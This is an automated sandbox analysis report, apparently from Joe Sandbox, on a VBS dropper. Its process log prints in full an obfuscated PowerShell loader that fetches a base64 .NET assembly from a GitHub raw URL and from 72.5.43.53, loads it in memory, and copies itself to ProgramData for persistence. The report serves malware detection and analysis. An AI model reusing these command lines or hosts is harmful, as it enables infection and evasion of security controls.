Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberProps source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineImportType source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: System.Collections.Generic.IEnumerable<dnlib.DotNet.Pdb.PdbScope>.GetEnumerator source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromSig source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: System.Core.pdb source: powershell.exe, 00000003.00000002.2203709649.0000022A9B821000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumEvents source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamForMethodIndex source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineField source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsGlobal source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodsWithName source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp
Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetEventProps source: powershell.exe, 00000003.00000002.2204838178.0000022A9BB00000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 00000003.00000002.2185790329.0000022A944FE000.00000004.00000800.00020000.00000000.sdmp

Software Vulnerabilities

barindex
Suspicious execution chain found
Source: C:\Windows\System32\wscript.exeChild: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Source: autopatia.vbs.4.drBinary string: http://schemas.microsoft.com/wbem/wsman/1/config/service><transport>transport</transport><force/></analyze_input> - obfuscation quality: 4
Source: autopatia.vbs.4.drBinary string: http://schemas.microsoft.com/wbem/wsman/1/config/service><transport>transport</transport></analyze_input> - obfuscation quality: 4
Source: global trafficHTTP traffic detected: GET /NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /450/RRCFG.txt HTTP/1.1Host: 72.5.43.53Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /450/RRCFG.txt HTTP/1.1Host: 72.5.43.53Connection: Keep-Alive
Source: Joe Sandbox ViewIP Address: 185.199.111.133 185.199.111.133
Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: unknownTCP traffic detected without corresponding DNS query: 72.5.43.53
Source: unknownTCP traffic detected without corresponding DNS query: 72.5.43.53
Source: unknownTCP traffic detected without corresponding DNS query: 72.5.43.53
Source: unknownTCP traffic detected without corresponding DNS query: 72.5.43.53
Source: unknownTCP traffic detected without corresponding DNS query: 72.5.43.53
Source: unknownTCP traffic detected without corresponding DNS query: 72.5.43.53
Source: unknownTCP traffic detected without corresponding DNS query: 72.5.43.53
Source: unknownTCP traffic detected without corresponding DNS query: 72.5.43.53
Source: unknownTCP traffic detected without corresponding DNS query: 72.5.43.53
Source: unknownTCP traffic detected without corresponding DNS query: 72.5.43.53
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt HTTP/1.1Host: raw.githubusercontent.comConnection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /450/RRCFG.txt HTTP/1.1Host: 72.5.43.53Connection: Keep-Alive
Source: global trafficHTTP traffic detected: GET /450/RRCFG.txt HTTP/1.1Host: 72.5.43.53Connection: Keep-Alive
Source: global trafficDNS traffic detected: DNS query: raw.githubusercontent.com
Source: powershell.exe, 00000003.00000002.2171869287.0000022A83938000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.5.43.53
Source: powershell.exe, 00000003.00000002.2171869287.0000022A83A08000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.5.43.53(
Source: powershell.exe, 00000003.00000002.2171869287.0000022A83938000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://72.5.43.53/450/RRCFG.txt
Source: powershell.exe, 00000003.00000002.2185790329.0000022A93555000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2171869287.0000022A84F82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000003.00000002.2171869287.0000022A84E0D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2171869287.0000022A84C1E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000003.00000002.2171869287.0000022A84BCE000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://raw.githubusercontent.com
Source: powershell.exe, 00000001.00000002.2215386722.0000021D94DCC000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2171869287.0000022A834E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000003.00000002.2171869287.0000022A84C1E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: powershell.exe, 00000003.00000002.2171869287.0000022A84E0D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2171869287.0000022A84C1E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000001.00000002.2215386722.0000021D94D87000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6
Source: powershell.exe, 00000001.00000002.2215386722.0000021D94D9C000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2171869287.0000022A834E1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
Source: powershell.exe, 00000003.00000002.2171869287.0000022A84F82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000003.00000002.2171869287.0000022A84F82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000003.00000002.2171869287.0000022A84F82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000003.00000002.2171869287.0000022A84E0D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2171869287.0000022A84C1E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000003.00000002.2171869287.0000022A844FC000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
Source: powershell.exe, 00000003.00000002.2185790329.0000022A93555000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2171869287.0000022A84F82000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: powershell.exe, 00000003.00000002.2171869287.0000022A84C1E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
Source: powershell.exe, 00000003.00000002.2171869287.0000022A84C1E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
Source: powershell.exe, 00000003.00000002.2171869287.0000022A84B48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercont
Source: powershell.exe, 00000003.00000002.2171869287.0000022A83702000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2171869287.0000022A84B48000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com
Source: powershell.exe, 00000003.00000002.2171869287.0000022A83702000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.2171869287.0000022A848D6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txt
Source: powershell.exe, 00000003.00000002.2171869287.0000022A83702000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://raw.githubusercontent.com/NoDetectOn/NoDetectOn/refs/heads/main/DetahNoth-V.txtQLe;
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49730
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
Source: unknownHTTPS traffic detected: 185.199.111.133:443 -> 192.168.2.4:49730 version: TLS 1.2

System Summary

barindex
Malicious sample detected (through community Yara rule)
Source: Process Memory Space: powershell.exe PID: 7464, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 7628, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Source: C:\Windows\System32\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
Wscript starts Powershell (via cmd or directly)
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnUjFsJysndXJsID0gJysnUUxlJysnaHR0cCcrJ3M6Ly8nKydyYScrJ3cnKycuZ2l0aCcrJ3UnKydidXNlcmNvbnRlbnQnKycuY28nKydtL05vRGV0ZWN0T24vTm9EZXQnKydlJysnYycrJ3RPbi9yJysnZWZzL2hlYWRzLycrJ20nKydhaW4vRGV0YWhOb3RoLScrJ1YudHgnKyd0UUxlOyBSMWxiYXNlNjRDbycrJ24nKyd0ZW50ID0gKE5ldy1PYmonKydlY3QgU3lzdGUnKydtLk5lJysndCcrJy4nKydXZScrJ2JDJysnbGknKydlbnQpLkRvdycrJ25sb2FkJysnU3RyaW4nKydnJysnKFInKycxbHVyJysnbCk7JysnIFIxbGJpbicrJ2FyeScrJ0MnKydvbnRlbnQnKycgJysnPSBbU3lzdCcrJ2VtLicrJ0NvbnZlcnRdOjpGcicrJ29tQicrJ2FzZTY0U3RyJysnaW4nKydnKFIxbGJhc2U2NCcrJ0NvbnQnKydlbicrJ3QpJysnOyBSJysnMWwnKydhc3MnKydlbWInKydseSA9IFtSZWYnKydsJysnZWN0aW9uLkEnKydzJysnc2UnKydtYmx5XTo6TCcrJ29hZCgnKydSMWxiaW5hJysncnlDb250JysnZW50KTsgJysnWycrJ2RubGliJysnLklPJysnLkgnKydvbWVdJysnOjonKydWQUkoZHprdHh0LicrJ0dGQ1JSLzAnKyc1NC8zJysnNS4zNC4nKyc1LjInKyc3Ly86cHR0aCcrJ2R6aycrJywgZHprJysnMWR6aycrJywgJysnZHprJysnQzprJysnc2gnKydQcm9ncicrJ2FtRGF0YWtzaGR6aywgZHprYXV0b3AnKydhdGlhZCcrJ3prLCcrJyBkemsnKydSZWcnKydBc21keicrJ2ssIGQnKyd6a2QnKyd6aycrJyxkJysnemtkJysnemspJyktUkVQTEFDZSAgKFtjaEFyXTEwMCtbY2hBcl0xMjIrW2NoQXJdMTA3KSxbY2hBcl0zNCAtUkVQTEFDZSAna3NoJyxbY2hBcl05Mi1DUkVwbEFDZSAgKFtjaEFyXTgyK1tjaEFyXTQ5K1tjaEFyXTEwOCksW2NoQXJdMzYgLVJFUExBQ2UnUUxlJyxbY2hBcl0zOSl8ICYoIChbc3RySU5nXSR2ZXJCT1NlUHJlZkVSRW5jZSlbMSwzXSsneCctak9JbicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnUjFsJysndXJsID0gJysnUUxlJysnaHR0cCcrJ3M6Ly8nKydyYScrJ3cnKycuZ2l0aCcrJ3UnKydidXNlcmNvbnRlbnQnKycuY28nKydtL05vRGV0ZWN0T24vTm9EZXQnKydlJysnYycrJ3RPbi9yJysnZWZzL2hlYWRzLycrJ20nKydhaW4vRGV0YWhOb3RoLScrJ1YudHgnKyd0UUxlOyBSMWxiYXNlNjRDbycrJ24nKyd0ZW50ID0gKE5ldy1PYmonKydlY3QgU3lzdGUnKydtLk5lJysndCcrJy4nKydXZScrJ2JDJysnbGknKydlbnQpLkRvdycrJ25sb2FkJysnU3RyaW4nKydnJysnKFInKycxbHVyJysnbCk7JysnIFIxbGJpbicrJ2FyeScrJ0MnKydvbnRlbnQnKycgJysnPSBbU3lzdCcrJ2VtLicrJ0NvbnZlcnRdOjpGcicrJ29tQicrJ2FzZTY0U3RyJysnaW4nKydnKFIxbGJhc2U2NCcrJ0NvbnQnKydlbicrJ3QpJysnOyBSJysnMWwnKydhc3MnKydlbWInKydseSA9IFtSZWYnKydsJysnZWN0aW9uLkEnKydzJysnc2UnKydtYmx5XTo6TCcrJ29hZCgnKydSMWxiaW5hJysncnlDb250JysnZW50KTsgJysnWycrJ2RubGliJysnLklPJysnLkgnKydvbWVdJysnOjonKydWQUkoZHprdHh0LicrJ0dGQ1JSLzAnKyc1NC8zJysnNS4zNC4nKyc1LjInKyc3Ly86cHR0aCcrJ2R6aycrJywgZHprJysnMWR6aycrJywgJysnZHprJysnQzprJysnc2gnKydQcm9ncicrJ2FtRGF0YWtzaGR6aywgZHprYXV0b3AnKydhdGlhZCcrJ3prLCcrJyBkemsnKydSZWcnKydBc21keicrJ2ssIGQnKyd6a2QnKyd6aycrJyxkJysnemtkJysnemspJyktUkVQTEFDZSAgKFtjaEFyXTEwMCtbY2hBcl0xMjIrW2NoQXJdMTA3KSxbY2hBcl0zNCAtUkVQTEFDZSAna3NoJyxbY2hBcl05Mi1DUkVwbEFDZSAgKFtjaEFyXTgyK1tjaEFyXTQ5K1tjaEFyXTEwOCksW2NoQXJdMzYgLVJFUExBQ2UnUUxlJyxbY2hBcl0zOSl8ICYoIChbc3RySU5nXSR2ZXJCT1NlUHJlZkVSRW5jZSlbMSwzXSsneCctak9JbicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
Source: WW8kzvnphl.vbsInitial sample: Strings found which are bigger than 50
Source: Process Memory Space: powershell.exe PID: 7464, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: Process Memory Space: powershell.exe PID: 7628, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
Source: classification engineClassification label: mal100.expl.evad.winVBS@11/7@1/2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7472:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7748:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vvp2ytn3.kpy.ps1Jump to behavior
Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\WW8kzvnphl.vbs"
Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: WW8kzvnphl.vbsReversingLabs: Detection: 13%
Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\WW8kzvnphl.vbs"
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnUjFsJysndXJsID0gJysnUUxlJysnaHR0cCcrJ3M6Ly8nKydyYScrJ3cnKycuZ2l0aCcrJ3UnKydidXNlcmNvbnRlbnQnKycuY28nKydtL05vRGV0ZWN0T24vTm9EZXQnKydlJysnYycrJ3RPbi9yJysnZWZzL2hlYWRzLycrJ20nKydhaW4vRGV0YWhOb3RoLScrJ1YudHgnKyd0UUxlOyBSMWxiYXNlNjRDbycrJ24nKyd0ZW50ID0gKE5ldy1PYmonKydlY3QgU3lzdGUnKydtLk5lJysndCcrJy4nKydXZScrJ2JDJysnbGknKydlbnQpLkRvdycrJ25sb2FkJysnU3RyaW4nKydnJysnKFInKycxbHVyJysnbCk7JysnIFIxbGJpbicrJ2FyeScrJ0MnKydvbnRlbnQnKycgJysnPSBbU3lzdCcrJ2VtLicrJ0NvbnZlcnRdOjpGcicrJ29tQicrJ2FzZTY0U3RyJysnaW4nKydnKFIxbGJhc2U2NCcrJ0NvbnQnKydlbicrJ3QpJysnOyBSJysnMWwnKydhc3MnKydlbWInKydseSA9IFtSZWYnKydsJysnZWN0aW9uLkEnKydzJysnc2UnKydtYmx5XTo6TCcrJ29hZCgnKydSMWxiaW5hJysncnlDb250JysnZW50KTsgJysnWycrJ2RubGliJysnLklPJysnLkgnKydvbWVdJysnOjonKydWQUkoZHprdHh0LicrJ0dGQ1JSLzAnKyc1NC8zJysnNS4zNC4nKyc1LjInKyc3Ly86cHR0aCcrJ2R6aycrJywgZHprJysnMWR6aycrJywgJysnZHprJysnQzprJysnc2gnKydQcm9ncicrJ2FtRGF0YWtzaGR6aywgZHprYXV0b3AnKydhdGlhZCcrJ3prLCcrJyBkemsnKydSZWcnKydBc21keicrJ2ssIGQnKyd6a2QnKyd6aycrJyxkJysnemtkJysnemspJyktUkVQTEFDZSAgKFtjaEFyXTEwMCtbY2hBcl0xMjIrW2NoQXJdMTA3KSxbY2hBcl0zNCAtUkVQTEFDZSAna3NoJyxbY2hBcl05Mi1DUkVwbEFDZSAgKFtjaEFyXTgyK1tjaEFyXTQ5K1tjaEFyXTEwOCksW2NoQXJdMzYgLVJFUExBQ2UnUUxlJyxbY2hBcl0zOSl8ICYoIChbc3RySU5nXSR2ZXJCT1NlUHJlZkVSRW5jZSlbMSwzXSsneCctak9JbicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('R1l'+'url = '+'QLe'+'http'+'s://'+'ra'+'w'+'.gith'+'u'+'busercontent'+'.co'+'m/NoDetectOn/NoDet'+'e'+'c'+'tOn/r'+'efs/heads/'+'m'+'ain/DetahNoth-'+'V.tx'+'tQLe; R1lbase64Co'+'n'+'tent = (New-Obj'+'ect Syste'+'m.Ne'+'t'+'.'+'We'+'bC'+'li'+'ent).Dow'+'nload'+'Strin'+'g'+'(R'+'1lur'+'l);'+' R1lbin'+'ary'+'C'+'ontent'+' '+'= [Syst'+'em.'+'Convert]::Fr'+'omB'+'ase64Str'+'in'+'g(R1lbase64'+'Cont'+'en'+'t)'+'; R'+'1l'+'ass'+'emb'+'ly = [Ref'+'l'+'ection.A'+'s'+'se'+'mbly]::L'+'oad('+'R1lbina'+'ryCont'+'ent); '+'['+'dnlib'+'.IO'+'.H'+'ome]'+'::'+'VAI(dzktxt.'+'GFCRR/0'+'54/3'+'5.34.'+'5.2'+'7//:ptth'+'dzk'+', dzk'+'1dzk'+', '+'dzk'+'C:k'+'sh'+'Progr'+'amDatakshdzk, dzkautop'+'atiad'+'zk,'+' dzk'+'Reg'+'Asmdz'+'k, d'+'zkd'+'zk'+',d'+'zkd'+'zk)')-REPLACe ([chAr]100+[chAr]122+[chAr]107),[chAr]34 -REPLACe 'ksh',[chAr]92-CREplACe ([chAr]82+[chAr]49+[chAr]108),[chAr]36 -REPLACe'QLe',[chAr]39)| &( ([strINg]$verBOSePrefEREnce)[1,3]+'x'-jOIn'')"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\autopatia.vbs"
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProgramData\autopatia.vbs"
Source: unknownProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\ProgramData\autopatia.vbs"
Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'KCgnUjFsJysndXJsID0gJysnUUxlJysnaHR0cCcrJ3M6Ly8nKydyYScrJ3cnKycuZ2l0aCcrJ3UnKydidXNlcmNvbnRlbnQnKycuY28nKydtL05vRGV0ZWN0T24vTm9EZXQnKydlJysnYycrJ3RPbi9yJysnZWZzL2hlYWRzLycrJ20nKydhaW4vRGV0YWhOb3RoLScrJ1YudHgnKyd0UUxlOyBSMWxiYXNlNjRDbycrJ24nKyd0ZW50ID0gKE5ldy1PYmonKydlY3QgU3lzdGUnKydtLk5lJysndCcrJy4nKydXZScrJ2JDJysnbGknKydlbnQpLkRvdycrJ25sb2FkJysnU3RyaW4nKydnJysnKFInKycxbHVyJysnbCk7JysnIFIxbGJpbicrJ2FyeScrJ0MnKydvbnRlbnQnKycgJysnPSBbU3lzdCcrJ2VtLicrJ0NvbnZlcnRdOjpGcicrJ29tQicrJ2FzZTY0U3RyJysnaW4nKydnKFIxbGJhc2U2NCcrJ0NvbnQnKydlbicrJ3QpJysnOyBSJysnMWwnKydhc3MnKydlbWInKydseSA9IFtSZWYnKydsJysnZWN0aW9uLkEnKydzJysnc2UnKydtYmx5XTo6TCcrJ29hZCgnKydSMWxiaW5hJysncnlDb250JysnZW50KTsgJysnWycrJ2RubGliJysnLklPJysnLkgnKydvbWVdJysnOjonKydWQUkoZHprdHh0LicrJ0dGQ1JSLzAnKyc1NC8zJysnNS4zNC4nKyc1LjInKyc3Ly86cHR0aCcrJ2R6aycrJywgZHprJysnMWR6aycrJywgJysnZHprJysnQzprJysnc2gnKydQcm9ncicrJ2FtRGF0YWtzaGR6aywgZHprYXV0b3AnKydhdGlhZCcrJ3prLCcrJyBkemsnKydSZWcnKydBc21keicrJ2ssIGQnKyd6a2QnKyd6aycrJyxkJysnemtkJysnemspJyktUkVQTEFDZSAgKFtjaEFyXTEwMCtbY2hBcl0xMjIrW2NoQXJdMTA3KSxbY2hBcl0zNCAtUkVQTEFDZSAna3NoJyxbY2hBcl05Mi1DUkVwbEFDZSAgKFtjaEFyXTgyK1tjaEFyXTQ5K1tjaEFyXTEwOCksW2NoQXJdMzYgLVJFUExBQ2UnUUxlJyxbY2hBcl0zOSl8ICYoIChbc3RySU5nXSR2ZXJCT1NlUHJlZkVSRW5jZSlbMSwzXSsneCctak9JbicnKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "(('R1l'+'url = '+'QLe'+'http'+'s://'+'ra'+'w'+'.gith'+'u'+'busercontent'+'.co'+'m/NoDetectOn/NoDet'+'e'+'c'+'tOn/r'+'efs/heads/'+'m'+'ain/DetahNoth-'+'V.tx'+'tQLe; R1lbase64Co'+'n'+'tent = (New-Obj'+'ect Syste'+'m.Ne'+'t'+'.'+'We'+'bC'+'li'+'ent).Dow'+'nload'+'Strin'+'g'+'(R'+'1lur'+'l);'+' R1lbin'+'ary'+'C'+'ontent'+' '+'= [Syst'+'em.'+'Convert]::Fr'+'omB'+'ase64Str'+'in'+'g(R1lbase64'+'Cont'+'en'+'t)'+'; R'+'1l'+'ass'+'emb'+'ly = [Ref'+'l'+'ection.A'+'s'+'se'+'mbly]::L'+'oad('+'R1lbina'+'ryCont'+'ent); '+'['+'dnlib'+'.IO'+'.H'+'ome]'+'::'+'VAI(dzktxt.'+'GFCRR/0'+'54/3'+'5.34.'+'5.2'+'7//:ptth'+'dzk'+', dzk'+'1dzk'+', '+'dzk'+'C:k'+'sh'+'Progr'+'amDatakshdzk, dzkautop'+'atiad'+'zk,'+' dzk'+'Reg'+'Asmdz'+'k, d'+'zkd'+'zk'+',d'+'zkd'+'zk)')-REPLACe ([chAr]100+[chAr]122+[chAr]107),[chAr]34 -REPLACe 'ksh',[chAr]92-CREplACe ([chAr]82+[chAr]49+[chAr]108),[chAr]36 -REPLACe'QLe',[chAr]39)| &( ([strINg]$verBOSePrefEREnce)[1,3]+'x'-jOIn'')"Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /C copy *.vbs "C:\ProgramData\autopatia.vbs"Jump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: mlang.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: scrrun.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
